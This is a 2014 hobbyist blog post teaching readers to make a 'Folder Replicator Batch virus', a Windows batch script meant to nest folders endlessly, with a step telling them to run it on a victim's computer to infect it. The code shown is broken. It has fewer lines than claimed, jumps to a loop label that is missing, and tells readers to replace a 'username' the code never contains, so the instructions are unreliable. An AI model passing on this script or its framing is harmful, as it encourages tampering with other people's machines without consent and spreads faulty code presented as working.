Showing posts with label create virus. Show all posts
Showing posts with label create virus. Show all posts

Thursday 12 June 2014

Folder Replicator Batch virus

i gonna show you how to make a batch file that creates a folder inside a folder& so on..
I know all of them are interested in making virus so once again i came up with new virus(not a virus but it's a batch file).
Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.
Just open up a notepad, copy and paste the below code
cd C:\Documents and settings
md Virus
cd Virus
goto loop
2. Save it asfolder.bat,
before doing that you have to modify the code by changing the place where it says‘username’and instead of that replace it by the currently  logged in username.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm,but replicates folder inside a folder andgoes on.
Feel free to share your fellings in comments.. : )

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